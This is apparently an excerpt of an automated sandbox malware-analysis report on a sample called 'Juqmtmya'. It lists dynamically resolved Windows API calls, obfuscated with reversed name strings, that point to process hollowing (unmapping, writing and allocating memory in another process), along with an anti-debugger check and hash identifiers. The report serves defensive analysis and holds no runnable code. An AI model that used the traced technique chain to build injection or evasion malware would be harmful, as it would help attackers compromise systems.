• 2cf7a2c-2cf7a47 → 2cf7a4c (call 2ce4530) → 2cf7a51-2cf7a56
• 2cf7a51-2cf7a56 → 2cf7a2e-2cf7a4c (call 2ce4530) → back to 2cf7a51-2cf7a56
• 2cf7a51-2cf7a56 → 2cf7a58-2cf7ac2 (calls 2cf798c, 2ce47ec, 2ce49a0, 2cf81cc, 2cf8274, NtAllocateVirtualMemory, 2ce4500)
APIs
  • Part of subcall function 02CF81CC: GetModuleHandleA.KERNELBASE(?), ref: 02CF821E
  • Part of subcall function 02CF8274: GetProcAddress.KERNEL32(?,?), ref: 02CF82D9
• NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02CF7A9F
Strings
Memory Dump Source
• Source File: 00000010.00000002.2348010673.0000000002CE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CE1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_2ce1000_Juqmtmya.jbxd
Similarity
• API ID: AddressAllocateHandleMemoryModuleProcVirtual
• String ID: ntdll$yromeMlautriVetacollAwZ
• API String ID: 421316089-445027087
• Opcode ID: 737c5df727d7dab3c98797be01dcf4a13940e284111c4f2f85995c6923c094f1
• Instruction ID: b46f6b96a56e59913b95e95c419267f80c7eb1e6083ef3316229fb48c3b0eb3d
• Opcode Fuzzy Hash: 737c5df727d7dab3c98797be01dcf4a13940e284111c4f2f85995c6923c094f1
• Instruction Fuzzy Hash: 88116975680308BFEB94EFA4EC41EAEB7AEEB48B00F414460FA01D7200D630AE04DB60

Control-flow Graph
APIs
  • Part of subcall function 02CF81CC: GetModuleHandleA.KERNELBASE(?), ref: 02CF821E
  • Part of subcall function 02CF8274: GetProcAddress.KERNEL32(?,?), ref: 02CF82D9
• NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02CF8471
Strings
Memory Dump Source
• Source File: 00000010.00000002.2348010673.0000000002CE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CE1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_2ce1000_Juqmtmya.jbxd
Similarity
• API ID: AddressHandleMemoryModuleProcReadVirtual
• String ID: ntdll$yromeMlautriVdaeRtN
• API String ID: 2004920654-737317276
• Opcode ID: 0dd66e1c0c6fb7341cc41d1a7288c195bfdcd068c77673adf7d797bf7ebe26c6
• Instruction ID: 21baff5960e4041f13ea19bb34894a45ca1eacdabcb64f4bb54ff3e470a6b0d2
• Opcode Fuzzy Hash: 0dd66e1c0c6fb7341cc41d1a7288c195bfdcd068c77673adf7d797bf7ebe26c6
• Instruction Fuzzy Hash: 17014875640308AFEB94EFA8DC51E9EBBAEFB49704F518560FA05D7700D634AE10DB24

Control-flow Graph
APIs
  • Part of subcall function 02CF81CC: GetModuleHandleA.KERNELBASE(?), ref: 02CF821E
  • Part of subcall function 02CF8274: GetProcAddress.KERNEL32(?,?), ref: 02CF82D9
• NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02CF7DEC
Strings
Memory Dump Source
• Source File: 00000010.00000002.2348010673.0000000002CE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CE1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_2ce1000_Juqmtmya.jbxd
Similarity
• API ID: AddressHandleMemoryModuleProcVirtualWrite
                                                                                                                                                                                                                                                                                                                                  • String ID: Ntdll$yromeMlautriVetirW
                                                                                                                                                                                                                                                                                                                                  • API String ID: 4260932595-3542721025

Control-flow Graph

APIs
  • Part of subcall function 02CF81CC: GetModuleHandleA.KERNELBASE(?), ref: 02CF821E
  • Part of subcall function 02CF8274: GetProcAddress.KERNEL32(?,?), ref: 02CF82D9
• NtUnmapViewOfSection.NTDLL(?,?), ref: 02CF86D5
Strings
Memory Dump Source
• Source File: 00000010.00000002.2348010673.0000000002CE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CE1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_2ce1000_Juqmtmya.jbxd
Similarity
• API ID: AddressHandleModuleProcSectionUnmapView
• String ID: noitceSfOweiVpamnUtN$ntdll
• API String ID: 2801472262-2520021413

Control-flow Graph

APIs
  • Part of subcall function 02CF81CC: GetModuleHandleA.KERNELBASE(?), ref: 02CF821E
  • Part of subcall function 02CF8274: GetProcAddress.KERNEL32(?,?), ref: 02CF82D9
• NtUnmapViewOfSection.NTDLL(?,?), ref: 02CF86D5
Strings
Memory Dump Source
• Source File: 00000010.00000002.2348010673.0000000002CE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CE1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_2ce1000_Juqmtmya.jbxd
Similarity
• API ID: AddressHandleModuleProcSectionUnmapView
• String ID: ntdll
• API String ID: 2801472262-3337577438

Control-flow Graph

APIs
  • Part of subcall function 02CF81CC: GetModuleHandleA.KERNELBASE(?), ref: 02CF821E
  • Part of subcall function 02CF8274: GetProcAddress.KERNEL32(?,?), ref: 02CF82D9
• CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02CF8814
Strings
Memory Dump Source
• Source File: 00000010.00000002.2348010673.0000000002CE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CE1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_2ce1000_Juqmtmya.jbxd
Similarity
• API ID: AddressCreateHandleModuleProcProcessUser
• String ID: CreateProcessAsUserW$Kernel32
• API String ID: 4105707577-2353454454

Control-flow Graph

APIs
• CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02CFF77D
Strings
Memory Dump Source
• Source File: 00000010.00000002.2348010673.0000000002CE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CE1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_2ce1000_Juqmtmya.jbxd
Similarity
• API ID: CheckDebuggerPresentRemote
• String ID: CheckRemoteDebuggerPresent$KernelBase
• API String ID: 3662101638-539270669
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02CF81CC: GetModuleHandleA.KERNELBASE(?), ref: 02CF821E
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02CF8274: GetProcAddress.KERNEL32(?,?), ref: 02CF82D9
                                                                                                                                                                                                                                                                                                                                  • FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02CF83C2), ref: 02CF83A4
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000010.00000002.2348010673.0000000002CE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CE1000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_2ce1000_Juqmtmya.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: AddressCacheFlushHandleInstructionModuleProc
                                                                                                                                                                                                                                                                                                                                  • String ID: FlushInstructionCache$Kernel32
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2392256011-184458249
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 9c446e680efd0c1e61f0e633ba5e5c9d4a241c3ba86045c925c818ea418e4b1b
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 21567a5beb4d0b9c2dcec06b8ecbe9dd59fd92fa81ef89e6117beb2eaec4a64e
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9c446e680efd0c1e61f0e633ba5e5c9d4a241c3ba86045c925c818ea418e4b1b
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C301A971780308AFEB94EFA4DC01F9AB7EEEB09B00F514560FA04D2314C630AD14AA24
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,?), ref: 02CF82D9
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000010.00000002.2348010673.0000000002CE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CE1000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_2ce1000_Juqmtmya.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: AddressProc
                                                                                                                                                                                                                                                                                                                                  • String ID: Kernel32$sserddAcorPteG
                                                                                                                                                                                                                                                                                                                                  • API String ID: 190572456-1372893251
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: a1cde36c335342018255f634d94957467e07f6d26e7f2264a1511b9f27793766
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: b5cff6d54a2c2cc23c9c3477cd545e2bd6e9ced7b290235e452644164b1fc60f
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a1cde36c335342018255f634d94957467e07f6d26e7f2264a1511b9f27793766
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0201A274740308AFEB54EBA4DC41E5EB7AEEB49B00F514460F901D7700D630AD04DA24
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02CF8274: GetProcAddress.KERNEL32(?,?), ref: 02CF82D9
                                                                                                                                                                                                                                                                                                                                  • GetModuleHandleA.KERNELBASE(?), ref: 02CF821E
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000010.00000002.2348010673.0000000002CE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CE1000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_2ce1000_Juqmtmya.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                                                                                                                                  • String ID: AeldnaHeludoMteG$KernelBASE
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1646373207-1952140341
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 0cae682d7d08b1cbc425a50ff24455eb438b3ba12a6b42d8560ba28fc3956c74
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 630f8a0a3a0ed0ae59fbcc379416e9a1acdb822f4e5d8571a8b6df8e5321cf1c
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0cae682d7d08b1cbc425a50ff24455eb438b3ba12a6b42d8560ba28fc3956c74
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E6F09070A84708AFEB94EFA4DC55D5AB7EEEB4A700B514960FA01D3710D630BE10EA24